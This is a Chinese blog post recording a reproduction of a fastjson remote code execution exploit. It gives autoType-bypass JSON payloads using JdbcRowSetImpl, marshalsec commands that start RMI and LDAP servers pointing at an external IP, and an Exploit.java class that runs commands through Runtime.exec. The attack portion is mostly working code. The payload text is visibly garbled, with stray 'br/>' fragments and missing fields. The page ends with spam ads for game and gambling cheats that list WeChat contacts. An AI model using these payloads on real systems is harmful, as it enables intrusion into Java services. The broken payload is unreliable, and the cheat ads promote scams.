fastjson的RCE漏洞复现记录
admin
2023-01-30 09:27:44
0

参考链接:

https://paper.seebug.org/994/
https://www.cnblogs.com/jinqi520/p/11097779.html
https://xz.aliyun.com/t/5680

0x01 漏洞复现 RMi

fastjson的RCE漏洞复现记录

1. payload:

{"a":{
"@type":"java.lang.Class",
br/>"a":{
"@type":"java.lang.Class",
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
br/>},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"autoCommit":true
}
}

fastjson的RCE漏洞复现记录

2. 在×××上执行,启动一个rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://106.12.201.224/#Exploit"

  1. 生成编译***脚本

将下面代码保存为:Exploit.java
然后执行:javac Exploit.java,生成class文件

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

0x02 漏洞复现 LDAP

1. payload:

{"a":{
"@type":"java.lang.Class",
br/>"a":{
"@type":"java.lang.Class",
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
br/>},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"autoCommit":true
}
}

fastjson的RCE漏洞复现记录

2. 在×××上执行,启动一个rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://106.12.201.224/#Exploit"

  1. 生成编译***脚本
    Exploit.java 中不要导入包

将下面代码保存为:Exploit.java
然后执行:javac Exploit.java,生成class文件

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

0x03 漏洞原理

这次绕过的大体思路是通过java.lang.Class,将JdbcRowSetImpl类加载到map缓存,从而绕过autotype的检测。因此将payload分两次发送,第一次加载,第二次执行。默认情况下,只要遇到没有加载到缓存的类,checkautotype就会抛出异常并中止。

当发送第一次请求时,Class是通过deserializers.findClass加载的,然后Class将JdbcRowSetImpl类加载进map中,然后第二次请求时,就这里就成功找到了JdbcRowSetImpl类,从而绕过检测。

相关内容

热门资讯

【今日要闻】“陕西欢喜开挂神器... 您好:陕西欢喜这款游戏可以开挂,确实是有挂的,需要了解加客服微信【9784099】很多玩家在这款游戏...
终于了解“天天爱泰州麻将怎么装... 您好:天天爱泰州麻将这款游戏可以开挂,确实是有挂的,需要了解加客服微信【9784099】很多玩家在这...
最新引进“毛豆大厅牛牛辅助器?... 最新引进“毛豆大厅牛牛辅助器?”(详细开挂教程)您好,毛豆大厅牛牛这个游戏其实有挂的,确实是有挂的,...
【第一资讯】“王子棋牌怎么开挂... 【第一资讯】“王子棋牌怎么开挂?”(详细开挂教程)您好,王子棋牌这个游戏其实有挂的,确实是有挂的,需...
最新引进“授权大厅炸/金/花怎... 有 亲,根据资深记者爆料授权大厅炸/金/花是可以开挂的,确实有挂(咨询软...
重磅消息“老友内蒙古麻将怎么开... 重磅消息“老友内蒙古麻将怎么开挂?”(确实真的有挂)您好,老友内蒙古麻将这个游戏其实有挂的,确实是有...
终于懂了“新天天游戏有没有挂?... 家人们!今天小编来为大家解答新天天游戏透视挂怎么安装这个问题咨询软件客服徽9752949的挂在哪里买...
玩家分享攻略“三鑫联盟到底有挂... 玩家分享攻略“三鑫联盟到底有挂吗?”(透视曝光猫腻)您好,三鑫联盟这个游戏其实有挂的,确实是有挂的,...
【第一消息】“情怀古诗词到底有... 有 亲,根据资深记者爆料情怀古诗词是可以开挂的,确实有挂(咨询软件无需打...
重磅消息“yy比鸡是不是有挂?... 网上科普关于“yy比鸡有没有挂”话题很是火热,小编也是针对yy比鸡作*弊开挂的方法以及开挂对应的知识...